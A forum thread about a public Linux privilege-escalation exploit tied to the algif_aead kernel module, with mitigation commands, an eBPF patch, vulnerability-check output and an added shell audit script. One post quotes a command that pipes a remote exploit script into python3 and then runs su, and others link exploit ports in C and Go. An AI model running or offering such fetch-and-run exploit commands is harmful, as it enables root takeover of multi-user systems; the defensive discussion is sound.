Public exploit on most Linux distro’s - patching recommended


Comments

  • rpqu Member

    @BackboneDirect said:
    Rebootless method for patching via eBPF

    https://github.com/wgnet/wg.copyfail.patch

    sudo apt install -y clang libbpf-dev linux-bpf-dev git   # build dependencies
    git clone https://github.com/wgnet/wg.copyfail.patch
    cd wg.copyfail.patch
    sudo bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h   # kernel type definitions from the running kernel's BTF
    sudo ./build.sh build   # project build script
    ./apply.sh load         # project script that loads the eBPF program
    
    
  • oloke Member, Host Rep
    edited May 3

    @amarc said:
    From what I gathered, if that kernel module is not loaded/available it's not exploitable? Because on my couple of servers (Deb12, Deb13, Ubuntu 24.04 systems) these are not loaded, and when I run curl https://copy.fail/exp | python3 && su nothing really happens and all I get is some:

    Traceback (most recent call last):
      File "<stdin>", line 9, in <module>
      File "<stdin>", line 5, in c
    FileNotFoundError: [Errno 2] No such file or directory
    

    Yes exactly, this output means it is not exploitable (since algif_aead module is not present).

  • emperor Member
    edited May 3

    @amarc said: if that kernel module is not loaded/available it's not exploitable

    Yes this, and also python should be 3.10+. It won't work on lower versions. In the RHEL 8 family and Slackware python was +/- 3.9.25, that's why it was not working.

  • zed Member

    hey let me rawdog this exploit poc on my servers

  • eliphas Member
    edited May 3

    https://github.com/tgies/copy-fail-c
    no python needed, static binary that you can cross compile. uses some suid binary or change passwd to impersonate some other 4-digit user. scary.

  • tuc Member

    Me the only user on all my VPS servers.

  • wii747 Member

    @tuc said:
    Me the only user on all my VPS servers.

    I am root on all my servers.

  • tuc Member

    @eliphas said:
    https://github.com/tgies/copy-fail-c
    no python needed, static binary that you can cross compile. uses some suid binary or change passwd to impersonate some other 4-digit user. scary.

    It does work, and it is available in go too (https://github.com/badsectorlabs/copyfail-go)

    If regular users have no access to c dev. environment, they can just go golang.

  • tuc Member

    My temporary "patch" is to follow the instructions at https://mondoo.com/vulnerability-intelligence/vulnerability/MONDOO-CVE-2026-31431, to disable algif_aead module.

    non-root user

    ./vulnerable
    content of testfile fd=3 ---
    init
    ---
    [+] target:    testfile
    [+] payload:   10 bytes (3 iterations)
    [+] patch fd=3 off=0 bytes="vuln"
    [+] patch ok
    [+] patch fd=3 off=4 bytes="erab"
    [+] patch ok
    [+] patch fd=3 off=8 bytes="le"
    [+] patch ok
    [+] page cache mutated
    content of testfile fd=3 ---
    vulnerable
    ---
    [!] VULNERABLE
    

    root user

    echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
    rmmod algif_aead 2>/dev/null
    

    non-root user

    ./vulnerable
    content of testfile fd=3 ---
    init
    ---
    [+] target:    testfile
    [+] payload:   10 bytes (3 iterations)
    [+] patch fd=3 off=0 bytes="vuln"
    bind(AF_ALG: authencesn(hmac(sha256),cbc(aes))): No such file or directory
    [-] patch_chunk failed at offset 0
    
  • amarc Veteran

    So it is scary but not that scary. It's not "every linux kernel since 2007" it's more like "every kernel with some module that is 50/50 not even there and 80% of people do not need it or even know what it is" situation.

    Thanked by 2: tux, borkedascii
  • gbzret4d Member

    Running yabs and turn off the vps prevents hacking

    Thanked by 1: concept
  • rpqu Member

    @gbzret4d said:
    Running yabs and turn off the vps prevents hacking

    Can't get hacked if OOM

    Thanked by 1: gbzret4d
  • PacketraOliver Member, Patron Provider
    edited May 5

    Even though it's based on a non-root user escalating the privilege, we were quick at closing this just in case, and applied kernel patches where applicable.

    Thanked by 1: forest
  • spuyet Member, Patron Provider

    I've built a free packages scanner so you can check how bad your server is with vulnerabilities: https://fivenines.io/tools/linux-package-vulnerability-scanner

  • forest Member

    @amarc said:
    So it is scary but not that scary. It's not "every linux kernel since 2007" it's more like "every kernel with some module that is 50/50 not even there and 80% of people do not need it or even know what it is" situation.

    Well, it's there on Debian, Ubuntu, RHEL, and RHEL clones by default.

  • rdes Member

    Not in RHEL7 (and clones), and it's a distribution from 2014.

  • forest Member

    One simple way to protect against this and similar vulnerabilities is just to disable module autoloading:

    echo "kernel.modprobe = " > /etc/sysctl.d/no-module-autoloading.conf
    sysctl -p /etc/sysctl.d/no-module-autoloading.conf
    

    Unlike kernel.modules_disabled = 1, this can be reverted by root and doesn't block manual module loading or unloading. All it does is prevent unprivileged processes from triggering module loading by requesting some obscure functionality from the kernel like a rare socket family.
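
Putting the two mitigations from this thread side by side, here is an added audit script (my own example, not code from the thread, from copy.fail, or from any of the linked repositories). It checks whether algif_aead is loaded right now, whether the running kernel ships it at all, whether a modprobe.d file carries the "install algif_aead /bin/false" override from tuc's post, and whether kernel.modprobe is empty as in forest's sysctl snippet above. The function names, the status words and the fixture layout are my own assumptions; every path defaults to the live system but is a parameter, so the same checks can be exercised against constructed files.

```shell
#!/bin/sh
# Added example, not from the thread or any linked project: audit a host for the
# two mitigations discussed above (the "install algif_aead /bin/false" modprobe.d
# override and the empty kernel.modprobe sysctl) and report whether algif_aead
# is loaded or can still be pulled in. Paths are parameters so the functions run
# against the live system by default or against constructed fixture files.

# 0 if algif_aead is listed in a /proc/modules-style file (module currently loaded).
algif_aead_loaded() {
    grep -q '^algif_aead ' "${1:-/proc/modules}" 2>/dev/null
}

# 0 if the kernel build ships algif_aead at all: either as a loadable .ko under
# the /lib/modules/<release> tree or compiled in (listed in modules.builtin).
algif_aead_available() {
    moddir="${1:-/lib/modules/$(uname -r)}"
    find "$moddir" -name 'algif_aead.ko*' 2>/dev/null | grep -q . && return 0
    grep -q 'algif_aead\.ko' "$moddir/modules.builtin" 2>/dev/null
}

# 0 if any .conf in a modprobe.d directory redirects algif_aead to /bin/false,
# which makes modprobe (and therefore kernel autoload) a no-op for it.
algif_aead_blocked() {
    cat "${1:-/etc/modprobe.d}"/*.conf 2>/dev/null |
        grep -qE '^[[:space:]]*install[[:space:]]+algif_aead[[:space:]]+/bin/false([[:space:]]|$)'
}

# 0 if kernel.modprobe is empty, so the kernel has no helper to run for an
# unprivileged request_module(), e.g. an AF_ALG bind naming an unloaded cipher.
autoload_disabled() {
    f="${1:-/proc/sys/kernel/modprobe}"
    [ -r "$f" ] || return 1
    [ -z "$(tr -d '[:space:]' < "$f")" ]
}

# Write the modprobe.d override from the thread into DIR (root for /etc/modprobe.d).
write_algif_aead_block() {
    printf 'install algif_aead /bin/false\n' > "${1:?modprobe.d directory}/disable-algif-aead.conf"
}

# Combine the checks. Arguments: modules_file moddir modprobe_dir sysctl_file.
# Prints exactly one of these (assumed labels, not from the thread):
#   loaded       module is in the kernel now; blocking autoload alone does not help,
#                it has to be unloaded (rmmod) or the kernel patched
#   not-built    no algif_aead in this kernel build (the FileNotFoundError case above)
#   mitigated    module absent and autoloading of it is blocked
#   autoloadable module absent, but an unprivileged bind can still pull it in
assess() {
    if algif_aead_loaded "$1"; then
        echo loaded
    elif ! algif_aead_available "$2"; then
        echo not-built
    elif algif_aead_blocked "$3" || autoload_disabled "$4"; then
        echo mitigated
    else
        echo autoloadable
    fi
}

# Report on the live host when run directly.
assess /proc/modules "/lib/modules/$(uname -r)" /etc/modprobe.d /proc/sys/kernel/modprobe
```

A "loaded" result is the case the thread's before/after output illustrates: the modprobe.d override only stops future loads, so rmmod (or a kernel update) is still needed. Reading /lib/modules may need root on some distributions, and a kernel with CONFIG_CRYPTO_USER_API_AEAD=y is reported through modules.builtin rather than /proc/modules.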

  • vbloods Member

    Updated ...

  • Am I the only one who think Ubuntu sucks in security nowadays?
    Debian took a day to release a new kernel patching dirty frag, and still nothing from Ubuntu. Not in 24.04, nothing in 26.04. Waiting for a week now, that is not good.

  • emperor Member

    New updates are available for debian.

    Thanked by 1: default
  • forest Member

    @jorohe6515 said: Am I the only one who think Ubuntu sucks in security nowadays?

    It's usually the opposite. Ubuntu promptly releases fixes for even minor security issues while Debian only does emergency releases for major issues. Ubuntu also uses more compile-time hardening than Debian.

    Thanked by 1: buggedout
  • OhJohn Member
    edited May 17

    @jorohe6515 said: Am I the only one who think Ubuntu sucks in security nowadays?

    Nope, you are not.

    And this 404 is also not good: https://ubuntu.com/security/CVE-2026-46333 (Sunday, 22:20 UTC)

    Thanked by 1: oloke
  • OhJohn Member

    A three week security cycle on kernel builds just does not help if you get a potential zero day every friday...
